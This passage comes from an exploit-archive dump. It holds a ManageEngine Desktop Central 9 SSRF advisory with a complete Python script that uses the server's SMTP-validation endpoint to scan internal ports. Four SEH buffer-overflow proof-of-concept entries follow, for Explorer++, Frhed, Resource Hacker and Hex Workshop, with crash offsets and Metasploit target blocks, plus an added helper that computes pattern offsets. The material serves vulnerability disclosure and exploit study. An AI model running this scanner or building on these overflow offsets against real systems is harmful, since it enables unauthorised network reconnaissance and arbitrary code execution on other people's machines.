/>Upgrade-Insecure-Requests: 1<br />Content-Length: 0<br />Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;<br />STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;<br />showRefMsg=false; summarypage=false;<br />DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;<br />JSESSIONID=0B20DEF653941DAF5748931B67972CDB;<br />JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024<br />Host: localhost<br /><br /><br />Response:<br />HTTP/1.1 200 OK<br />Date:<br />Server: Apache<br />Pragma: public<br />Cache-Control: max-age=0<br />Expires: Wed, 31 Dec 1969 16:00:00 PST<br />SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;<br />Secure<br />Set-Cookie: buildNum=91084; Path=/<br />Set-Cookie: showRefMsg=false; Path=/<br />Set-Cookie: summarypage=false; Path=/<br />Set-Cookie: dc_customerid=1; Path=/<br />Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/<br />Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/<br />Set-Cookie: screenResolution=1280x1024; Path=/<br />Content-Disposition: attachment; filename=any<br />Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013<br />X-dc-header: yes<br />Content-Length: 4470<br />Keep-Alive: timeout=5, max=100<br />Connection: Keep-Alive<br />Content-Type: application/pdf;charset=UTF-8<br /><br /><br /><br /># Vulnerability Type: Server-Side Request Forgery (SSRF)<br /><br />CVSS v3: 8.0<br />CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H<br />CWE: CWE-918 Server-Side Request Forgery (SSRF)<br /><br />Vulnerability description: Server-Side Request Forgery (SSRF) vulnerability<br />in ManageEngine Desktop Central 9.1.0 allows an attacker to force a<br />vulnerable server to trigger malicious requests to third-party servers or<br />to internal resources. 
This vulnerability allows an authenticated attacker<br />with network access via HTTP to launch specific attacks such as a<br />cross-site port attack, service enumeration, and various other attacks.<br /><br />Proof of concept:<br /><br />Save this content in a Python file (e.g. ssrf_manageenginedesktop9.py) and<br />change the value of the sitevuln variable to the IP address of the vulnerable host:<br /><br />import argparse<br />from termcolor import colored<br />import requests<br />import urllib3<br />import datetime<br />urllib3.disable_warnings()<br /><br />print(colored('''<br />------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------<br />''',"red"))<br /><br />def smtpConfig_ssrf(target,port,d):<br />    # Time-based check: the SMTP validation endpoint connects to smtpServer:smtpPort<br />    # on the server side, and how long it takes to answer tells open from closed.<br />    now1 = datetime.datetime.now()<br />    text = ''<br />    sitevuln = 'localhost'<br />    url = 'https://'+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin%40manageengine.com&validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin%40manageengine.com'<br />    cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73; buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false; JSESSIONID=D10A9C62D985A0966647099E14C622F8; DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0'<br />    try:<br />        response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': 'https://192.168.56.250:8383/smtpConfig.do','Cookie': cookie,'Connection': 'keep-alive'},verify=False, timeout=10)<br /><br />        text = response.text<br />        now2 = datetime.datetime.now()<br />        rest = (now2 - now1)<br />        seconds = rest.total_seconds()<br /><br />        # The login page is served instead of the result when the session cookie is no longer valid.<br />        if ('updateRefMsgCookie' in text):<br />            return colored('Cookie lost',"yellow")<br /><br />        if d == "0":<br />            print ('Time response: ' + str(rest) + '\n' + text + '\n')<br /><br />        if (seconds > 5.0):<br />            return colored('open',"green")<br />        else:<br />            return colored('closed',"red")<br /><br />    except:<br />        # A client-side timeout (10 s) also counts as a slow answer.<br />        now2 = datetime.datetime.now()<br />        rest = (now2 - now1)<br />        seconds = rest.total_seconds()<br />        if (seconds > 10.0):<br />            return colored('open',"green")<br />        else:<br />            return colored('closed',"red")<br /><br />    return colored('unknown',"yellow")<br /><br /><br />if __name__ == "__main__":<br />    parser = argparse.ArgumentParser()<br />    parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 - SSRF Open ports",required=True)<br />    parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9 - SSRF Open ports",required=True)<br />    parser.add_argument('-d','--debug', help="ManageEngine Desktop Central 9 - SSRF Open ports (0 print or 1 no print)",required=False)<br />    args = parser.parse_args()<br />    timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug)<br />    print (args.ip + ':' + args.port + ' ' + timeresp + '\n')<br /><br /><br /><br />And:<br /><br />$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080<br /><br />------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------<br /><br />192.168.56.250:8080 open<br /><br />$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777<br /><br />------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------<br /><br />192.168.56.250:7777 closed<br /><br /></code></pre>
<pre><code># Exploit Title: Explorer32++ 1.3.5.531 - Buffer overflow<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2022-01-09<br /># Vendor Homepage: http://www.explorerplusplus.com/<br /># Software Link : http://www.explorerplusplus.com/<br /># Tested Version: 1.3.5.531<br /># Tested on: Windows 10<br /><br />CVSS v3: 7.3<br />CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H<br />CWE: CWE-119<br /><br />Buffer overflow controlling the Structured Exception Handler (SEH) records<br />in Explorer++ 1.3.5.531, and possibly other versions, may allow attackers<br />to execute arbitrary code via a long file name argument.<br /><br />Proof of concept:<br /><br />Open Explorer32++.exe from command line with a large string in Arguments,<br />more than 396 chars:<br /><br />File '<Explorer++_PATH>\Explorer32++.exe'<br />Arguments<br />'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...'<br /><br />SEH chain of main thread<br />Address SE handler<br />0018FB14 00690041<br />00370069 *** CORRUPT ENTRY ***<br /><br />0BADF00D [+] Examining SEH chain<br />0BADF00D SEH record (nseh field) at 0x0018fb14 overwritten with<br />unicode pattern : 0x00370069 (offset 262), followed by 626 bytes of cyclic<br />data after the handler<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Frhed (Free hex editor) v1.6.0 - Buffer overflow<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2022-01-09<br /># Vendor Homepage: http://frhed.sourceforge.net/<br /># Software Link : http://frhed.sourceforge.net/<br /># Tested Version: 1.6.0<br /># Tested on: Windows 10<br /><br />CVSS v3: 7.3<br />CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H<br />CWE: CWE-119<br /><br />Buffer overflow controlling the Structured Exception Handler (SEH) records<br />in Frhed (Free hex editor) v1.6.0, and possibly other versions, may allow<br />attackers to execute arbitrary code via a long file name argument.<br /><br />Proof of concept:<br /><br />Open Frhed.exe from the command line with a large string in Arguments, more<br />than 494 chars:<br /><br />File '<Frhed_PATH>\Frhed.exe'<br />Arguments<br />'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...'<br /><br />SEH chain of main thread<br />Address SE handler<br />0018FC8C 41367141<br />35714134 *** CORRUPT ENTRY ***<br /><br />0BADF00D [+] Examining SEH chain<br />0BADF00D SEH record (nseh field) at 0x0018fc8c overwritten with<br />normal pattern : 0x35714134 (offset 494), followed by 876 bytes of cyclic<br />data after the handler<br /><br />0BADF00D ------------------------------<br /> 'Targets' =><br /> [<br /> [ '<fill in the OS/app version here>',<br /> {<br /> 'Ret' => 0x00401ba7, # pop ecx # pop ecx # ret - Frhed.exe (replace with another address that contains no \x00 byte)<br /> 'Offset' => 494<br /> }<br /> ],<br /> ],<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Resource Hacker 3.6.0.92 - Buffer overflow<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2022-01-06<br /># Vendor Homepage: http://www.angusj.com/resourcehacker/<br /># Software Link : http://www.angusj.com/resourcehacker/<br /># Tested Version: 3.6.0.92<br /># Tested on: Windows 10<br /><br />CVSS v3: 7.3<br />CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H<br />CWE: CWE-119<br /><br />Heap-based buffer overflow controlling the Structured Exception Handler<br />(SEH) records in Resource Hacker v3.6.0.92, and possibly other versions,<br />may allow attackers to execute arbitrary code via a long file name argument.<br /><br />Proof of concept:<br /><br />Open ResHacker.exe from the command line with a large string in Arguments, more<br />than 268 chars:<br /><br />File 'C:\ResourceHacker36\ResHacker.exe'<br />Arguments<br />'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac...'<br /><br />SEH chain of main thread<br />Address SE handler<br />0018FCB4 316A4130<br />6A413969 *** CORRUPT ENTRY ***<br /><br />0BADF00D [+] Examining SEH chain<br />0BADF00D SEH record (nseh field) at 0x0018fcb4 overwritten with<br />normal pattern : 0x6a413969 (offset 268), followed by 12 bytes of cyclic<br />data after the handler<br /><br />0BADF00D ------------------------------<br />'Targets' =><br />[<br />[ '<fill in the OS/app version here>',<br />{<br /> 'Ret' => 0x00426446, # pop eax # pop ebx # ret - ResHacker.exe (replace with a ret address found by Mona that contains no \x00 byte)<br /> 'Offset' => 268<br />}<br />],<br />],<br /><br /></code></pre>
<pre><code># Exploit Title: Hex Workshop v6.7 - Buffer overflow DoS<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2022-01-06<br /># Vendor Homepage: http://www.bpsoft.com, http://www.hexworkshop.com<br /># Software Link : http://www.bpsoft.com, http://www.hexworkshop.com<br /># Tested Version: v6.7<br /># Tested on: Windows 10<br /><br />CVSS v3: 7.3<br />CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H<br />CWE: CWE-119<br /><br />Hex Workshop v6.7 is vulnerable to a denial of service via a long command-line<br />file argument, which overwrites the Structured Exception Handler (SEH) records.<br /><br />Proof of concept:<br /><br />Open HWorks32.exe from the command line with a large string in Arguments, more<br />than 268 chars:<br /><br />File 'C:\Hex Workshop\HWorks32.exe'<br />Arguments<br />'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag...'<br /><br />0BADF00D [+] Examining SEH chain<br />0BADF00D SEH record (nseh field) at 0x0089e63c overwritten with<br />unicode pattern : 0x00390069 (offset 268), followed by 0 bytes of cyclic<br />data after the handler<br /><br />The application crashes.<br /><br /></code></pre>
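All four SEH advisories above (Explorer++, Frhed, Resource Hacker, Hex Workshop) report an overwritten nSEH value and an offset derived from the `Aa0Aa1...` cyclic pattern. The Python below is an added example of how that triage step works, written here and not taken from Mona or Metasploit: it regenerates the pattern, converts the 32-bit value from the SEH chain back into the bytes that sat on the stack (little-endian, with the UTF-16 expansion undone for the two Unicode cases), and reports where those bytes occur; the default pattern length is an assumption. It reproduces the four reported offsets and also shows why a two-character Unicode match can be ambiguous.

```python
import string


def cyclic_pattern(length):
    """Metasploit-style pattern 'Aa0Aa1Aa2...': the upper-case letter cycles
    slowest, the lower-case letter next, the digit fastest, so any 4-byte
    window is unique within the first 20280 characters."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def seh_value_to_text(value, unicode=False):
    """Recover the pattern characters a debugger shows as a 32-bit SEH value.
    The value is read little-endian; for a UTF-16LE ('unicode') expansion every
    second byte is a NUL the conversion inserted, so 4 bytes = 2 characters."""
    raw = value.to_bytes(4, "little")
    return raw.decode("utf-16-le") if unicode else raw.decode("ascii")


def pattern_offsets(value, unicode=False, length=5000):
    """Every offset at which the recovered characters occur in the pattern."""
    pattern = cyclic_pattern(length)
    needle = seh_value_to_text(value, unicode)
    hits, start = [], pattern.find(needle)
    while start != -1:
        hits.append(start)
        start = pattern.find(needle, start + 1)
    return hits


def pattern_offset(value, unicode=False, length=5000):
    """First match only; with a 4-character (non-Unicode) needle it is unique,
    with a 2-character Unicode needle the caller must pick among the hits."""
    hits = pattern_offsets(value, unicode, length)
    return hits[0] if hits else -1


if __name__ == "__main__":
    # Values as reported in the four advisories above.
    reports = [
        ("Explorer++ nSEH", 0x00370069, True),
        ("Frhed nSEH", 0x35714134, False),
        ("Frhed SE handler", 0x41367141, False),
        ("Resource Hacker nSEH", 0x6A413969, False),
        ("Hex Workshop nSEH", 0x00390069, True),
    ]
    for label, value, is_unicode in reports:
        text = seh_value_to_text(value, is_unicode)
        print(f"{label:22} {value:#010x} -> {text!r:8} offsets {pattern_offsets(value, is_unicode)}")
```

The Frhed pair is the consistency check worth knowing: the nSEH value sits at offset 494 and the SE handler value at 498, four bytes later, exactly as the two fields are laid out in an SEH record.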